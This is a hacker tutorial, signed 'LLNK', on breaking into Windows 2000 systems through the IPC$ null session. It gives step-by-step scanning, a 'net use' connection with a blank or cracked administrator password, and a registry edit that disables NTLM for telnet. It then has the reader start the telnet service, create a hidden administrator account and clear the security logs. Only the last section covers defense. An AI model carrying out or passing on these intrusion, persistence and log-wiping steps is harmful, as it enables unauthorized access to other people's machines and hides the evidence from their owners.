| Hacking
a Windows 2000 system through IPC$ by LLNK |
1: Scanning for open Win2k systems
2: Connecting to the IPC$
3: Connecting and using Computer Management.
4. Disable NTLM
5: Starting the Telnet service
6: Creating user accounts and adding them to a group
7: Covering your tracks
8: How to protect your Win2k system from this attack
-----------------------------------------------------------------------------------------------------
You need to be running a Win2k system:
Superscan version 3.00 by Foundstone
(246kb). Homepage
NetBrute Scanner 1.0.0.7 (247KB).
Homepage
PQWak V1.0 (24KB)
----------------------------------------------------------------------------------------------------
|
| 1:
Scanning for open Win2k systems |
A. Open SuperScan 2.05 (Port scanner)
B. Select a IP range
C. Check "Only scan responsive pings" and "All selected
ports in list"
D. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
E. When a system with both Netbios and BlackJack is found, open NetBrute,
and scan that IP to see if there is an IPC$
|
| 2:
Connecting to the IPC$ |
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator
"
C. If you connect to the system, it will say, " The command was
completed successfully "
D. If it says, “bad username or password”, Try running PQWak.exe
to crack the share name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
E. Users usually have only one password for everything. So try the
c$ share pass as the administrator password to connect to the IPC$
|
| 3:
Connecting using Computer Management |
A. Open Computer Management.
B. Click “Action”, then “Connect to Another Computer”
C. Type in the IP address.
|
| 4.
Disable NTLM |
A. Open “regedit”
B. Connect to the following registry key:
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0—->NTLM
C. Set the value data from (2) to (1)
D. That will enable login to the telnet server without being connected
to the IPC$ or a trusted domain.
|
| 5.
Starting the Telnet service |
A. In Computer Management, click “Services
and Applications”
B. Click Services
C. Right click on the Telnet Service and open Properties.
D. Set the service to Automatic, and start the service.
|
| 6:
Creating user accounts and adding them to a group |
A. Open a dos window, and type the following:
telnet IPaddress
B. If prompted to type a username and password, type Administrator
with no password.
C. To create a user account, type the following: Net user username
password /add
D. Replace “Username” and “password” with whatever
you like.
E. To add a user account to a domain, type the following: Net localgroup
administrators username /add Or Net group administrators username
/add
|
| 7:
Covering your tracks |
A. Open a dos window, and type the following:
Net use \\ipaddress\ipc$ /delete
B. While logged on to Computer Management. Check if the Security Logs
are being audited in Event Viewer. If they are, clear them. :-)
|
| 8:
How to protect your Win2k system from this attack |
A. Open Regedit
B. Connect to the following:
C. HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
D. Change the "Value Data" from 0 to 1. It should say 0x00000001(1)
E. That will disable remote logon to a null IPC$
F. Always have a complicated administrator password with Windows2000
or any other OS
G. Install a firewall. www.zonealarm.com
|
| Credits |
LLNK #Hackerz on Dalnet <llnk19@hushmail.com>
|
|